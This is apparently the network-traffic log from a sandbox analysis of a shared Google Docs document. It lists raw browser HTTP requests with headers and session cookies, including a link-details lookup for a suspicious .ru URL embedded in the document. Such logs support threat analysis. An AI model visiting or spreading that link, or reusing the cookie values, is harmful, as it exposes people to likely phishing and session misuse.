              Source: global trafficHTTP traffic detected: GET /static/document/client/js/2374546085-client_js_prod_kix_docos.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; GFE_RTT=321
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/test?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&sid=5f1661c399f525af&includes_info_params=true&usp=sharing_eip&cros_files=false&VER=8&lsq=-1&u=ANONYMOUS_06287517911256457317&flr=0&gsi&ssfi=0&smv=68&smb=%5B2147483647%2C%20oAE%3D%5D&cimpl=0&MODE=init&zx=1w11o0ses2xr&t=1 HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; lbcs=0
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/trash/read?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&includes_info_params=true&usp=sharing_eip&cros_files=false HTTP/1.1Host: docs.google.comConnection: keep-aliveX-Build: editors.documents-frontend_20250225.02_p2sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Rel-Id: 2b2.340d1f33.ssec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"X-Client-Deadline-Ms: 20000sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; lbcs=0
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/peruserchrome?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&includes_info_params=true&usp=sharing_eip&cros_files=false HTTP/1.1Host: docs.google.comConnection: keep-aliveX-Build: editors.documents-frontend_20250225.02_p2sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Rel-Id: 2b2.340d1f33.ssec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"X-Client-Deadline-Ms: 20000sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; lbcs=0
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/1227232233-client_js_prod_kix_pre_tertiary_deps.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/280474012-client_js_prod_kix_tertiary.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/test?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&sid=5f1661c399f525af&includes_info_params=true&usp=sharing_eip&cros_files=false&VER=8&tab=t.0&lsq=-1&u=ANONYMOUS_06287517911256457317&flr=0&gsi&ssfi=1&ar=5&arat=MwEZMz6Tm3KrcA&smv=68&smb=%5B2147483647%2C%20oAE%3D%5D&cimpl=0&TYPE=xmlhttp&zx=xc7i7xk1hum&t=1 HTTP/1.1Host: 0.docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://docs.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/bind?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&sid=5f1661c399f525af&includes_info_params=true&usp=sharing_eip&cros_files=false&VER=8&tab=t.0&lsq=1741175246205&u=ANONYMOUS_06287517911256457317&flr=0&gsi&ssfi=5&ar=5&arat=MwEZMz6Tm3KrcA&smv=68&smb=%5B2147483647%2C%20oAE%3D%5D&cimpl=0&RID=rpc&SID=69F6928CF37D2E86&CI=0&AID=1&TYPE=xmlhttp&zx=tswaydynwij8&t=1 HTTP/1.1Host: 0.docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://docs.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/linkdetails?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&linkurl=https%3A%2F%2F2ya.leyapham.ru%2Fzdvftqs%2F&includes_info_params=true&usp=sharing_eip&cros_files=false&tab=t.0 HTTP/1.1Host: docs.google.comConnection: keep-aliveX-Build: editors.documents-frontend_20250225.02_p2sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Rel-Id: 2b2.340d1f33.ssec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"X-Client-Deadline-Ms: 20000sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /drivesharing/clientmodel?id=17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI&foreignService=kix&authuser=0&origin=https%3A%2F%2Fdocs.google.com HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/gettemplategallerydataaction?forcehl=1&hl=en HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: 